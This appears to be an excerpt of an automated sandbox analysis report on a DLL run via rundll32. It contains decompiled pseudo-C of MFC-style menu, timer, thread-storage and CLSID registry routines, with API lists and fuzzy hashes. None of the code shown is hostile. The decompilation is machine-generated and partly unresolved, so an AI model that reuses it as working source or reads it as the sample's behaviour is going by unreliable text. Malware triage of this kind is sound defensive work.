                                                                                                        0x00000000
                                                                                                        0x10014330
                                                                                                        0x10014330
                                                                                                        0x1001438b
                                                                                                        0x1001438e
                                                                                                        0x10014394
                                                                                                        0x1001439a
                                                                                                        0x1001439d
                                                                                                        0x1001444d
                                                                                                        0x00000000
                                                                                                        0x1001444d
                                                                                                        0x100143a9
                                                                                                        0x100143af
                                                                                                        0x100143b3
                                                                                                        0x100143b6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100143bf
                                                                                                        0x100143e9
                                                                                                        0x100143ed
                                                                                                        0x100143f1
                                                                                                        0x100143ff
                                                                                                        0x100143ff
                                                                                                        0x100143ff
                                                                                                        0x10014401
                                                                                                        0x10014401
                                                                                                        0x10014402
                                                                                                        0x10014402
                                                                                                        0x10014406
                                                                                                        0x1001440e
                                                                                                        0x10014414
                                                                                                        0x10014419
                                                                                                        0x10014438
                                                                                                        0x10014438
                                                                                                        0x1001443b
                                                                                                        0x00000000
                                                                                                        0x1001443b
                                                                                                        0x1001441e
                                                                                                        0x10014433
                                                                                                        0x10014429
                                                                                                        0x1001442b
                                                                                                        0x1001442e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014430
                                                                                                        0x10014430
                                                                                                        0x10014430
                                                                                                        0x10014430
                                                                                                        0x00000000
                                                                                                        0x10014433
                                                                                                        0x100143f3
                                                                                                        0x100143f8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100143fc
                                                                                                        0x00000000
                                                                                                        0x100143fc
                                                                                                        0x100143c6
                                                                                                        0x100143cd
                                                                                                        0x100143d0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100143d7
                                                                                                        0x100143db
                                                                                                        0x100143de
                                                                                                        0x100143e5
                                                                                                        0x00000000
                                                                                                        0x100143e5
                                                                                                        0x1001443e
                                                                                                        0x1001443e
                                                                                                        0x10014441
                                                                                                        0x10014444
                                                                                                        0x00000000
                                                                                                        0x100143a9
                                                                                                        0x1001432e
                                                                                                        0x100142f9
                                                                                                        0x10014301
                                                                                                        0x10014304
                                                                                                        0x10014309
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014309
                                                                                                        0x10014451

                                                                                                        APIs
                                                                                                          • Part of subcall function 10029945: GetFocus.USER32 ref: 10029946
                                                                                                          • Part of subcall function 10029945: GetParent.USER32(00000000), ref: 1002996F
                                                                                                          • Part of subcall function 10029945: GetWindowLongA.USER32 ref: 1002998A
                                                                                                          • Part of subcall function 10029945: GetParent.USER32(?), ref: 10029998
                                                                                                          • Part of subcall function 10029945: GetDesktopWindow.USER32 ref: 1002999C
                                                                                                          • Part of subcall function 10029945: SendMessageA.USER32 ref: 100299B0
                                                                                                        • GetMenu.USER32(?), ref: 1001433E
                                                                                                        • GetMenu.USER32(?), ref: 10014352
                                                                                                        • GetMenuItemCount.USER32 ref: 1001435B
                                                                                                        • GetSubMenu.USER32 ref: 1001436C
                                                                                                        • GetMenuItemCount.USER32 ref: 1001438E
                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 100143AF
                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 100143D7
                                                                                                        • GetMenuItemCount.USER32 ref: 1001440E
                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 10014429
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 4186786570-0
                                                                                                        • Opcode ID: e6094f0103dc02adf40df14fdf02a2557e22794f0ae115a2513906b63164a03e
                                                                                                        • Instruction ID: 11055ab72b521a342d6ad75c80d1664be5e7a41845d89626d5fa920a2132a9d2
                                                                                                        • Opcode Fuzzy Hash: e6094f0103dc02adf40df14fdf02a2557e22794f0ae115a2513906b63164a03e
                                                                                                        • Instruction Fuzzy Hash: 76516A3190021A9FDB01DF64C980A9EBBF5FF48690F224565E825EA160DB31EE81DB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 98%
                                                                                                        			E1002BBF1(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				struct tagPOINT _v20;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				short _t42;
                                                                                                        				signed int _t49;
                                                                                                        				struct HWND__* _t60;
                                                                                                        				intOrPtr _t63;
                                                                                                        				intOrPtr* _t64;
                                                                                                        				intOrPtr _t66;
                                                                                                        				void* _t68;
                                                                                                        				void* _t72;
                                                                                                        				intOrPtr* _t75;
                                                                                                        				intOrPtr _t83;
                                                                                                        				void* _t84;
                                                                                                        				intOrPtr _t85;
                                                                                                        				struct HWND__* _t87;
                                                                                                        				intOrPtr _t88;
                                                                                                        				intOrPtr* _t89;
                                                                                                        				void* _t90;
                                                                                                        
                                                                                                        				_t76 = __ecx;
                                                                                                        				_t89 = __ecx;
                                                                                                        				_t42 = GetKeyState(1);
                                                                                                        				_t91 = _t42;
                                                                                                        				if(_t42 < 0) {
                                                                                                        					return _t42;
                                                                                                        				}
                                                                                                        				_t85 = E1000AB4C(_t72, _t76, _t84, _t89, _t91);
                                                                                                        				_v12 = _t85;
                                                                                                        				GetCursorPos( &_v20);
                                                                                                        				ScreenToClient( *(_t89 + 0x20),  &_v20);
                                                                                                        				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t72);
                                                                                                        				_v8 = _t49;
                                                                                                        				if(_t49 < 0) {
                                                                                                        					_t16 = _t85 + 0x4c;
                                                                                                        					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
                                                                                                        					__eflags =  *_t16;
                                                                                                        					L18:
                                                                                                        					if(_v8 < 0) {
                                                                                                        						L27:
                                                                                                        						if( *(_v12 + 0x4c) == 0xffffffff) {
                                                                                                        							KillTimer( *(_t89 + 0x20), 0xe001);
                                                                                                        						}
                                                                                                        						 *((intOrPtr*)( *_t89 + 0x164))(0xffffffff);
                                                                                                        						L30:
                                                                                                        						_t53 = 0xe000;
                                                                                                        						if(_a4 == 0xe000) {
                                                                                                        							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
                                                                                                        							if(_v8 >= 0) {
                                                                                                        								_t53 =  *((intOrPtr*)( *_t89 + 0x164))(_v8);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						return _t53;
                                                                                                        					}
                                                                                                        					ClientToScreen( *(_t89 + 0x20),  &_v20);
                                                                                                        					_push(_v20.y);
                                                                                                        					_t87 = WindowFromPoint(_v20);
                                                                                                        					if(_t87 == 0) {
                                                                                                        						L25:
                                                                                                        						_t59 = _v12;
                                                                                                        						_v8 = _v8 | 0xffffffff;
                                                                                                        						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
                                                                                                        						L26:
                                                                                                        						if(_v8 >= 0) {
                                                                                                        							goto L30;
                                                                                                        						}
                                                                                                        						goto L27;
                                                                                                        					}
                                                                                                        					_t60 =  *(_t89 + 0x20);
                                                                                                        					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                                                                                                        						goto L26;
                                                                                                        					} else {
                                                                                                        						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                                                                                                        						if(_t63 != 0) {
                                                                                                        							_t63 =  *((intOrPtr*)(_t63 + 0x20));
                                                                                                        						}
                                                                                                        						if(_t63 == _t87) {
                                                                                                        							goto L26;
                                                                                                        						} else {
                                                                                                        							goto L25;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t64 = E1000FBCD(_t72, _t89, _t85);
                                                                                                        				_t81 = _t89;
                                                                                                        				_t75 = _t64;
                                                                                                        				if(E10010B28(_t75, _t89, _t85) == 0) {
                                                                                                        					L6:
                                                                                                        					_v8 = _v8 | 0xffffffff;
                                                                                                        					goto L7;
                                                                                                        				} else {
                                                                                                        					_t94 = _t75;
                                                                                                        					if(_t75 == 0) {
                                                                                                        						E1000836F(_t75, _t81, _t85, _t89, _t94);
                                                                                                        					}
                                                                                                        					_t81 = _t75;
                                                                                                        					if(E1001175A(_t75) != 0) {
                                                                                                        						L7:
                                                                                                        						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                                                                                                        						if(_t66 != 0) {
                                                                                                        							_t88 =  *((intOrPtr*)(_t66 + 0x20));
                                                                                                        						} else {
                                                                                                        							_t88 = 0;
                                                                                                        						}
                                                                                                        						_t68 = E1000E5E5(_t75, _t81, _t90, GetCapture());
                                                                                                        						if(_t68 != _t89) {
                                                                                                        							if(_t68 != 0) {
                                                                                                        								_t83 =  *((intOrPtr*)(_t68 + 0x20));
                                                                                                        							} else {
                                                                                                        								_t83 = 0;
                                                                                                        							}
                                                                                                        							if(_t83 != _t88 && E1000FBCD(_t75, _t68, _t88) == _t75) {
                                                                                                        								_v8 = _v8 | 0xffffffff;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						goto L18;
                                                                                                        					}
                                                                                                        					goto L6;
                                                                                                        				}
                                                                                                        			}



























                                                                                                        APIs
                                                                                                        • GetKeyState.USER32 ref: 1002BBFC
                                                                                                        • GetCursorPos.USER32(?), ref: 1002BC1B
                                                                                                        • ScreenToClient.USER32 ref: 1002BC28
                                                                                                        • GetCapture.USER32 ref: 1002BC7E
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • ClientToScreen.USER32(?,?), ref: 1002BCC5
                                                                                                        • WindowFromPoint.USER32(?,?), ref: 1002BCD1
                                                                                                        • IsChild.USER32(?,00000000), ref: 1002BCE6
                                                                                                        • KillTimer.USER32(?,0000E001), ref: 1002BD23
                                                                                                        • KillTimer.USER32(?,0000E000), ref: 1002BD3F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientKillScreenTimer$CaptureChildCursorException@8FromH_prolog3PointStateThrowWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3327746620-0
                                                                                                        • Opcode ID: 5e307a810b12152c442ace14b74901c03a1b6eed3aaefbbdbc235e4a2753dc9f
                                                                                                        • Instruction ID: 159fe96bd306aee816cdcfac18968978c7f6b861776227c188a7d2a48db909e4
                                                                                                        • Opcode Fuzzy Hash: 5e307a810b12152c442ace14b74901c03a1b6eed3aaefbbdbc235e4a2753dc9f
                                                                                                        • Instruction Fuzzy Hash: EC41A231600A06DFDB20DB64DC85A9E7BF5FF44364F614669E861E72E1EB30DE409B00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E10029F80(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* _t36;
                                                                                                        				void* _t39;
                                                                                                        				long _t41;
                                                                                                        				void* _t42;
                                                                                                        				long _t47;
                                                                                                        				void* _t53;
                                                                                                        				signed int _t55;
                                                                                                        				long* _t62;
                                                                                                        				struct _CRITICAL_SECTION* _t64;
                                                                                                        				void* _t65;
                                                                                                        				void* _t66;
                                                                                                        
                                                                                                        				_push(0x10);
                                                                                                        				E1003EEB5(0x10055913, __ebx, __edi, __esi);
                                                                                                        				_t62 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                                                                                                        				_t64 = __ecx + 0x1c;
                                                                                                        				 *(_t66 - 0x14) = _t64;
                                                                                                        				EnterCriticalSection(_t64);
                                                                                                        				_t36 =  *(_t66 + 8);
                                                                                                        				if(_t36 <= 0 || _t36 >= _t62[3]) {
                                                                                                        					_push(_t64);
                                                                                                        				} else {
                                                                                                        					_t65 = TlsGetValue( *_t62);
                                                                                                        					if(_t65 == 0) {
                                                                                                        						 *(_t66 - 4) = 0;
                                                                                                        						_t39 = E10029C33(0x10);
                                                                                                        						__eflags = _t39;
                                                                                                        						if(_t39 == 0) {
                                                                                                        							_t65 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        						} else {
                                                                                                        							 *_t39 = 0x1005d6a4;
                                                                                                        							_t65 = _t39;
                                                                                                        						}
                                                                                                        						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                                                        						 *(_t65 + 8) = 0;
                                                                                                        						 *(_t65 + 0xc) = 0;
                                                                                                        						E10029D4F( &(_t62[5]), _t65);
                                                                                                        						goto L5;
                                                                                                        					} else {
                                                                                                        						_t55 =  *(_t66 + 8);
                                                                                                        						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                                                                                                        							L5:
                                                                                                        							if( *(_t65 + 0xc) != 0) {
                                                                                                        								_t41 = E10001FC0(_t62[3], 4);
                                                                                                        								_t53 = 2;
                                                                                                        								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                                                                                                        							} else {
                                                                                                        								_t47 = E10001FC0(_t62[3], 4);
                                                                                                        								_pop(_t53);
                                                                                                        								_t42 = LocalAlloc(0, _t47);
                                                                                                        							}
                                                                                                        							_t76 = _t42;
                                                                                                        							if(_t42 == 0) {
                                                                                                        								LeaveCriticalSection( *(_t66 - 0x14));
                                                                                                        								_t42 = E1000833B(0, _t53, _t62, _t65, _t76);
                                                                                                        							}
                                                                                                        							 *(_t65 + 0xc) = _t42;
                                                                                                        							E1003E9B0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                                                                                                        							 *(_t65 + 8) = _t62[3];
                                                                                                        							TlsSetValue( *_t62, _t65);
                                                                                                        							_t55 =  *(_t66 + 8);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t36 =  *(_t65 + 0xc);
                                                                                                        					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                                                                                                        						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                                                                                                        					}
                                                                                                        					_push( *(_t66 - 0x14));
                                                                                                        				}
                                                                                                        				LeaveCriticalSection();
                                                                                                        				return E1003EF21(_t36);
                                                                                                        			}














                                                                                                        0x10029fea
                                                                                                        0x1002a04f
                                                                                                        0x1002a051
                                                                                                        0x1002a056
                                                                                                        0x1002a05c
                                                                                                        0x1002a05c
                                                                                                        0x1002a064
                                                                                                        0x1002a075
                                                                                                        0x1002a081
                                                                                                        0x1002a086
                                                                                                        0x1002a08c
                                                                                                        0x1002a08c
                                                                                                        0x10029fc8
                                                                                                        0x1002a08f
                                                                                                        0x1002a094
                                                                                                        0x1002a09e
                                                                                                        0x1002a09e
                                                                                                        0x1002a0a1
                                                                                                        0x1002a0a1
                                                                                                        0x1002a0a7
                                                                                                        0x1002a0b2

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 10029F87
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000010,1002A135,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?), ref: 10029F98
                                                                                                        • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?,B5E27FEF), ref: 10029FB6
                                                                                                        • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 10029FEA
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?,B5E27FEF), ref: 1002A056
                                                                                                        • _memset.LIBCMT ref: 1002A075
                                                                                                        • TlsSetValue.KERNEL32(?,00000000), ref: 1002A086
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?,B5E27FEF), ref: 1002A0A7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1891723912-0
                                                                                                        • Opcode ID: 172c129eae0db517c8b6dd071ff8b8284833e4f914b3c9d64947cd1ec8495298
                                                                                                        • Instruction ID: e85b89dc55b8c4c7bfc2145fc03a69089535fd0d038428d6430331e622b520f8
                                                                                                        • Opcode Fuzzy Hash: 172c129eae0db517c8b6dd071ff8b8284833e4f914b3c9d64947cd1ec8495298
                                                                                                        • Instruction Fuzzy Hash: A5319C74500A16EFDB20DF50D8C5D6EBBB4EF00350B61C52AE956A66A2CB30AE90CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1002EF48(void* __esi, char* _a4, int _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				short _v528;
                                                                                                        				short _v1048;
                                                                                                        				short _v1568;
                                                                                                        				int _v1572;
                                                                                                        				char* _v1576;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				signed int _t20;
                                                                                                        				int _t23;
                                                                                                        				void* _t26;
                                                                                                        				char* _t35;
                                                                                                        				int _t37;
                                                                                                        				void* _t42;
                                                                                                        				char* _t43;
                                                                                                        				void* _t47;
                                                                                                        				signed int _t49;
                                                                                                        
                                                                                                        				_t44 = __esi;
                                                                                                        				_t20 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t20 ^ _t49;
                                                                                                        				_t37 = _a8;
                                                                                                        				_t43 = _a4;
                                                                                                        				_v1576 = _t37;
                                                                                                        				if(lstrcmpiA(_t43, _t37) == 0) {
                                                                                                        					_t23 = GetSystemMetrics(0x2a);
                                                                                                        					if(_t23 != 0) {
                                                                                                        						_push(__esi);
                                                                                                        						_v1572 = lstrlenA(_t43);
                                                                                                        						if(_v1572 != lstrlenA(_t37)) {
                                                                                                        							L13:
                                                                                                        							_t26 = 0;
                                                                                                        						} else {
                                                                                                        							_t37 = GetThreadLocale();
                                                                                                        							GetStringTypeExA(_t37, 1, _t43, 0xffffffff,  &_v1568);
                                                                                                        							GetStringTypeExA(_t37, 4, _t43, 0xffffffff,  &_v528);
                                                                                                        							GetStringTypeExA(_t37, 1, _v1576, 0xffffffff,  &_v1048);
                                                                                                        							_t35 = _t43;
                                                                                                        							if( *_t43 == 0) {
                                                                                                        								L10:
                                                                                                        								_t26 = 1;
                                                                                                        							} else {
                                                                                                        								_t47 = 0;
                                                                                                        								while(( *(_t49 + _t47 - 0x20c) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x61c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x414))) {
                                                                                                        									_t47 = _t47 + 2;
                                                                                                        									if( *_t35 != 0) {
                                                                                                        										continue;
                                                                                                        									} else {
                                                                                                        										goto L10;
                                                                                                        									}
                                                                                                        									goto L11;
                                                                                                        								}
                                                                                                        								goto L13;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						L11:
                                                                                                        						_pop(_t44);
                                                                                                        					} else {
                                                                                                        						_t26 = _t23 + 1;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t26 = 0;
                                                                                                        				}
                                                                                                        				return E10039F21(_t26, _t37, _v8 ^ _t49, _t42, _t43, _t44);
                                                                                                        			}





















                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystemlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 2335526769-0
                                                                                                        • Opcode ID: 0d6d0573f979f267a73128ca0441079658bf37a2eb8bd65e14dee8729da5b269
                                                                                                        • Instruction ID: 90b8b980a8d9a3808b570a2489c9a8f5eb7b1165c7363315dc008fc05e8f7836
                                                                                                        • Opcode Fuzzy Hash: 0d6d0573f979f267a73128ca0441079658bf37a2eb8bd65e14dee8729da5b269
                                                                                                        • Instruction Fuzzy Hash: 1D21FD71900269AAE710DB749C84BAF7BECEB497A0F5002B5FD11E21D2DA709D41CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 89%
                                                                                                        			E10035404(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t54;
                                                                                                        				void* _t61;
                                                                                                        				char* _t75;
                                                                                                        				long _t77;
                                                                                                        				void* _t84;
                                                                                                        				void* _t97;
                                                                                                        				void* _t99;
                                                                                                        				void* _t100;
                                                                                                        				char _t103;
                                                                                                        				CHAR* _t104;
                                                                                                        				void* _t105;
                                                                                                        				CHAR* _t106;
                                                                                                        				char* _t107;
                                                                                                        				void* _t109;
                                                                                                        
                                                                                                        				_t97 = __edx;
                                                                                                        				_t107 = _t109 - 0xfc;
                                                                                                        				_t54 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_t107[0x100] = _t54 ^ _t107;
                                                                                                        				_push(0x24);
                                                                                                        				E1003EE82(0x1005626f, __ebx, __edi, __esi);
                                                                                                        				_t103 = _t107[0x10c];
                                                                                                        				_t99 = _t107[0x11c];
                                                                                                        				 *(_t107 - 0x1c) = _t103;
                                                                                                        				 *(_t107 - 0x2c) = _t107[0x110];
                                                                                                        				 *(_t107 - 0x18) = _t99;
                                                                                                        				E10001DB0(_t107 - 0x14, E10007F7E());
                                                                                                        				 *(_t107 - 4) =  *(_t107 - 4) & 0x00000000;
                                                                                                        				_t61 = E10007F7E();
                                                                                                        				_t86 = _t107 - 0x20;
                                                                                                        				E10001DB0(_t107 - 0x20, _t61);
                                                                                                        				 *(_t107 - 0x24) =  *(_t107 - 0x24) & 0x00000000;
                                                                                                        				if(_t99 == 0x80000000) {
                                                                                                        					RegOpenKeyExA(0x80000000, "CLSID", 0, 0x20019, _t107 - 0x24);
                                                                                                        				}
                                                                                                        				 *(_t107 - 0x30) =  *(_t107 - 0x24);
                                                                                                        				_t104 =  *_t103;
                                                                                                        				 *(_t107 - 4) = 2;
                                                                                                        				 *(_t107 - 0x28) = 1;
                                                                                                        				if(_t104 == 0) {
                                                                                                        					L16:
                                                                                                        					E1001BF1F(_t107 - 0x30);
                                                                                                        					E10001280( &(( *(_t107 - 0x20))[0xfffffffffffffff0]), _t97);
                                                                                                        					E10001280( &(( *(_t107 - 0x14))[0xfffffffffffffff0]), _t97);
                                                                                                        					 *[fs:0x0] =  *((intOrPtr*)(_t107 - 0xc));
                                                                                                        					_pop(_t100);
                                                                                                        					_pop(_t105);
                                                                                                        					_pop(_t84);
                                                                                                        					return E10039F21( *(_t107 - 0x28), _t84, _t107[0x100] ^ _t107, _t97, _t100, _t105);
                                                                                                        				} else {
                                                                                                        					do {
                                                                                                        						 *(_t107 - 0x1c) =  &(( *(_t107 - 0x1c))[1]);
                                                                                                        						if( *(_t107 - 0x18) != 0x80000000 ||  *_t104 != 0) {
                                                                                                        							 *(_t107 - 0x10) =  &(( &(_t104[1]))[lstrlenA(_t104)]);
                                                                                                        							E1002FA8E(_t86, _t97, _t107 - 0x14, _t104,  *(_t107 - 0x2c), _t107[0x114]);
                                                                                                        							E1002FA8E(_t86, _t97, _t107 - 0x20,  *(_t107 - 0x10),  *(_t107 - 0x2c), _t107[0x114]);
                                                                                                        							_t75 =  *(_t107 - 0x14);
                                                                                                        							if( *(_t107 - 0x18) != 0x80000000 ||  *((intOrPtr*)(_t75 - 0xc)) != 0) {
                                                                                                        								if(_t107[0x118] != 0) {
                                                                                                        									L11:
                                                                                                        									_t106 =  *(_t107 - 0x20);
                                                                                                        									 *(_t107 - 0x10) = _t75;
                                                                                                        									_t77 = RegSetValueA( *(_t107 - 0x18),  *(_t107 - 0x10), 1, _t106, lstrlenA(_t106));
                                                                                                        									if(_t77 != 0) {
                                                                                                        										if(_t77 != 5) {
                                                                                                        											 *(_t107 - 0x28) =  *(_t107 - 0x28) & 0x00000000;
                                                                                                        										}
                                                                                                        										goto L16;
                                                                                                        									}
                                                                                                        									goto L12;
                                                                                                        								}
                                                                                                        								_t86 = _t107;
                                                                                                        								 *(_t107 - 0x10) = 0x100;
                                                                                                        								if(RegQueryValueA( *(_t107 - 0x18), _t75, _t107, _t107 - 0x10) == 0) {
                                                                                                        									goto L12;
                                                                                                        								}
                                                                                                        								_t75 =  *(_t107 - 0x14);
                                                                                                        								goto L11;
                                                                                                        							} else {
                                                                                                        								goto L12;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						L12:
                                                                                                        						_t104 =  *( *(_t107 - 0x1c));
                                                                                                        					} while (_t104 != 0);
                                                                                                        					goto L16;
                                                                                                        				}
                                                                                                        			}


                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10035423
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000000,CLSID,00000000,00020019,00000000,00000000,00000000,00000024), ref: 10035481
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,00000024), ref: 100354BB
                                                                                                        • RegQueryValueA.ADVAPI32(?,?,?,?), ref: 10035516
                                                                                                        • lstrlenA.KERNEL32(?,?,?,?), ref: 1003552A
                                                                                                        • RegSetValueA.ADVAPI32(?,?,00000001,?,00000000), ref: 10035536
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Valuelstrlen$H_prolog3OpenQuery
                                                                                                        • String ID: CLSID
                                                                                                        • API String ID: 2019324235-910414637
                                                                                                        • Opcode ID: 4c4938c985efefa734c19c3610df5f4946220f96e44b0273001cdd498358f56c
                                                                                                        • Instruction ID: edc0b3564acc80adf763340bfe9e17e7942613623c0a78a1956e35ec68a7733d
